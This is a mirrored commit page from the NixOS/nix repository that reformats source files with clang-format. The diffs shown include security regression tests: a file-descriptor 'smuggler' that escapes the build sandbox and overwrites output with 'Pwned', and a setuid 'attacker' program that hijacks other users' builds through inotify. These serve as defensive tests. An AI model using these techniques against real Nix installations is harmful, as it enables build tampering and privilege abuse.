nixos/nix
1
1
Fork 0
mirror of https://github.com/NixOS/nix.git synced 2025-11-08 19:46:02 +01:00
Code Activity

Apply clang-format universally.

Browse source 
* It is tough to contribute to a project that doesn't use a formatter,
* It is extra hard to contribute to a project which has configured the formatter, but ignores it for some files
* Code formatting makes it harder to hide obscure / weird bugs by accident or on purpose,

Let's rip the bandaid off?

Note that PRs currently in flight should be able to be merged relatively easily by applying `clang-format` to their tip prior to merge.
This commit is contained in:
Graham Christensen 2025-07-18 12:47:27 -04:00
parent 41bf87ec70
commit e4f62e4608
587 changed files with 23258 additions and 23135 deletions
Download patch file Download diff file Expand all files Collapse all files

5
tests/functional/plugins/plugintest.cc
View file

@ -5,15 +5,14 @@ using namespace nix;
struct MySettings : Config
{
Setting<bool> settingSet{this, false, "setting-set",
"Whether the plugin-defined setting was set"};
Setting<bool> settingSet{this, false, "setting-set", "Whether the plugin-defined setting was set"};
};
MySettings mySettings;
static GlobalConfig::Register rs(&mySettings);
static void prim_anotherNull (EvalState & state, const PosIdx pos, Value ** args, Value & v)
static void prim_anotherNull(EvalState & state, const PosIdx pos, Value ** args, Value & v)
{
if (mySettings.settingSet)
v.mkNull();

10
tests/functional/test-libstoreconsumer/main.cc
View file

@ -5,7 +5,7 @@
using namespace nix;
int main (int argc, char **argv)
int main(int argc, char ** argv)
{
try {
if (argc != 2) {
@ -21,12 +21,8 @@ int main (int argc, char **argv)
// build the derivation
std::vector<DerivedPath> paths {
DerivedPath::Built {
.drvPath = makeConstantStorePathRef(store->parseStorePath(drvPath)),
.outputs = OutputsSpec::Names{"out"}
}
};
std::vector<DerivedPath> paths{DerivedPath::Built{
.drvPath = makeConstantStorePathRef(store->parseStorePath(drvPath)), .outputs = OutputsSpec::Names{"out"}}};
const auto results = store->buildPathsWithResults(paths, bmNormal, store);

28
tests/nixos/ca-fd-leak/sender.c
View file

@ -9,7 +9,8 @@
#include <string.h>
#include <assert.h>
int main(int argc, char **argv) {
int main(int argc, char ** argv)
{
assert(argc == 2);
@ -25,12 +26,12 @@ int main(int argc, char **argv) {
// executed in, just busyloop here.
int res = -1;
while (res < 0) {
res = connect(sock, (const struct sockaddr *)&data,
offsetof(struct sockaddr_un, sun_path)
+ strlen(argv[1])
+ 1);
if (res < 0 && errno != ECONNREFUSED) perror("connect");
if (errno != ECONNREFUSED) break;
res = connect(
sock, (const struct sockaddr *) &data, offsetof(struct sockaddr_un, sun_path) + strlen(argv[1]) + 1);
if (res < 0 && errno != ECONNREFUSED)
perror("connect");
if (errno != ECONNREFUSED)
break;
}
// Write our message header.
@ -39,27 +40,28 @@ int main(int argc, char **argv) {
msg.msg_controllen = 128;
// Write an SCM_RIGHTS message containing the output path.
struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
struct cmsghdr * hdr = CMSG_FIRSTHDR(&msg);
hdr->cmsg_len = CMSG_LEN(sizeof(int));
hdr->cmsg_level = SOL_SOCKET;
hdr->cmsg_type = SCM_RIGHTS;
int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
memcpy(CMSG_DATA(hdr), (void *) &fd, sizeof(int));
msg.msg_controllen = CMSG_SPACE(sizeof(int));
// Write a single null byte too.
msg.msg_iov = (struct iovec*) malloc(sizeof(struct iovec));
msg.msg_iov[0].iov_base = (void*) "";
msg.msg_iov = (struct iovec *) malloc(sizeof(struct iovec));
msg.msg_iov[0].iov_base = (void *) "";
msg.msg_iov[0].iov_len = 1;
msg.msg_iovlen = 1;
// Send it to the othher side of this connection.
res = sendmsg(sock, &msg, 0);
if (res < 0) perror("sendmsg");
if (res < 0)
perror("sendmsg");
int buf;
// Wait for the server to close the socket, implying that it has
// received the commmand.
recv(sock, (void *)&buf, sizeof(int), 0);
recv(sock, (void *) &buf, sizeof(int), 0);
}

33
tests/nixos/ca-fd-leak/smuggler.c
View file

@ -7,7 +7,8 @@
#include <assert.h>
#include <string.h>
int main(int argc, char **argv) {
int main(int argc, char ** argv)
{
assert(argc == 2);
@ -18,21 +19,21 @@ int main(int argc, char **argv) {
data.sun_family = AF_UNIX;
data.sun_path[0] = 0;
strncpy(data.sun_path + 1, argv[1], sizeof(data.sun_path) - 1);
int res = bind(sock, (const struct sockaddr *)&data,
offsetof(struct sockaddr_un, sun_path)
+ strlen(argv[1])
+ 1);
if (res < 0) perror("bind");
int res = bind(sock, (const struct sockaddr *) &data, offsetof(struct sockaddr_un, sun_path) + strlen(argv[1]) + 1);
if (res < 0)
perror("bind");
res = listen(sock, 1);
if (res < 0) perror("listen");
if (res < 0)
perror("listen");
int smuggling_fd = -1;
// Accept the connection a first time to receive the file descriptor.
fprintf(stderr, "%s\n", "Waiting for the first connection");
int a = accept(sock, 0, 0);
if (a < 0) perror("accept");
if (a < 0)
perror("accept");
struct msghdr msg = {0};
msg.msg_control = malloc(128);
@ -41,13 +42,12 @@ int main(int argc, char **argv) {
// Receive the file descriptor as sent by the smuggler.
recvmsg(a, &msg, 0);
struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
struct cmsghdr * hdr = CMSG_FIRSTHDR(&msg);
while (hdr) {
if (hdr->cmsg_level == SOL_SOCKET
&& hdr->cmsg_type == SCM_RIGHTS) {
if (hdr->cmsg_level == SOL_SOCKET && hdr->cmsg_type == SCM_RIGHTS) {
// Grab the copy of the file descriptor.
memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
memcpy((void *) &smuggling_fd, CMSG_DATA(hdr), sizeof(int));
}
hdr = CMSG_NXTHDR(&msg, hdr);
@ -58,11 +58,14 @@ int main(int argc, char **argv) {
// Wait for a second connection, which will tell us that the build is
// done
a = accept(sock, 0, 0);
if (a < 0) perror("accept");
if (a < 0)
perror("accept");
fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
// Write a new content to the file
if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
if (ftruncate(smuggling_fd, 0))
perror("ftruncate");
const char * new_content = "Pwned\n";
int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
if (written_bytes != strlen(new_content)) perror("write");
if (written_bytes != strlen(new_content))
perror("write");
}

128
tests/nixos/user-sandboxing/attacker.c
View file

@ -9,74 +9,74 @@
#define SYS_fchmodat2 452
int fchmodat2(int dirfd, const char *pathname, mode_t mode, int flags) {
return syscall(SYS_fchmodat2, dirfd, pathname, mode, flags);
int fchmodat2(int dirfd, const char * pathname, mode_t mode, int flags)
{
return syscall(SYS_fchmodat2, dirfd, pathname, mode, flags);
}
int main(int argc, char **argv) {
if (argc <= 1) {
// stage 1: place the setuid-builder executable
int main(int argc, char ** argv)
{
if (argc <= 1) {
// stage 1: place the setuid-builder executable
// make the build directory world-accessible first
chmod(".", 0755);
// make the build directory world-accessible first
chmod(".", 0755);
if (fchmodat2(AT_FDCWD, "attacker", 06755, AT_SYMLINK_NOFOLLOW) < 0) {
perror("Setting the suid bit on attacker");
exit(-1);
}
} else {
// stage 2: corrupt the victim derivation while it's building
// prevent the kill
if (setresuid(-1, -1, getuid())) {
perror("setresuid");
exit(-1);
}
if (fork() == 0) {
// wait for the victim to build
int fd = inotify_init();
inotify_add_watch(fd, argv[1], IN_CREATE);
int dirfd = open(argv[1], O_DIRECTORY);
if (dirfd < 0) {
perror("opening the global build directory");
exit(-1);
}
char buf[4096];
fprintf(stderr, "Entering the inotify loop\n");
for (;;) {
ssize_t len = read(fd, buf, sizeof(buf));
struct inotify_event *ev;
for (char *pe = buf; pe < buf + len;
pe += sizeof(struct inotify_event) + ev->len) {
ev = (struct inotify_event *)pe;
fprintf(stderr, "folder %s created\n", ev->name);
// wait a bit to prevent racing against the creation
sleep(1);
int builddir = openat(dirfd, ev->name, O_DIRECTORY);
if (builddir < 0) {
perror("opening the build directory");
continue;
}
int resultfile = openat(builddir, "build/result", O_WRONLY | O_TRUNC);
if (resultfile < 0) {
perror("opening the hijacked file");
continue;
}
int writeres = write(resultfile, "bad\n", 4);
if (writeres < 0) {
perror("writing to the hijacked file");
continue;
}
fprintf(stderr, "Hijacked the build for %s\n", ev->name);
return 0;
if (fchmodat2(AT_FDCWD, "attacker", 06755, AT_SYMLINK_NOFOLLOW) < 0) {
perror("Setting the suid bit on attacker");
exit(-1);
}
}
} else {
// stage 2: corrupt the victim derivation while it's building
// prevent the kill
if (setresuid(-1, -1, getuid())) {
perror("setresuid");
exit(-1);
}
if (fork() == 0) {
// wait for the victim to build
int fd = inotify_init();
inotify_add_watch(fd, argv[1], IN_CREATE);
int dirfd = open(argv[1], O_DIRECTORY);
if (dirfd < 0) {
perror("opening the global build directory");
exit(-1);
}
char buf[4096];
fprintf(stderr, "Entering the inotify loop\n");
for (;;) {
ssize_t len = read(fd, buf, sizeof(buf));
struct inotify_event * ev;
for (char * pe = buf; pe < buf + len; pe += sizeof(struct inotify_event) + ev->len) {
ev = (struct inotify_event *) pe;
fprintf(stderr, "folder %s created\n", ev->name);
// wait a bit to prevent racing against the creation
sleep(1);
int builddir = openat(dirfd, ev->name, O_DIRECTORY);
if (builddir < 0) {
perror("opening the build directory");
continue;
}
int resultfile = openat(builddir, "build/result", O_WRONLY | O_TRUNC);
if (resultfile < 0) {
perror("opening the hijacked file");
continue;
}
int writeres = write(resultfile, "bad\n", 4);
if (writeres < 0) {
perror("writing to the hijacked file");
continue;
}
fprintf(stderr, "Hijacked the build for %s\n", ev->name);
return 0;
}
}
}
exit(0);
}
exit(0);
}
}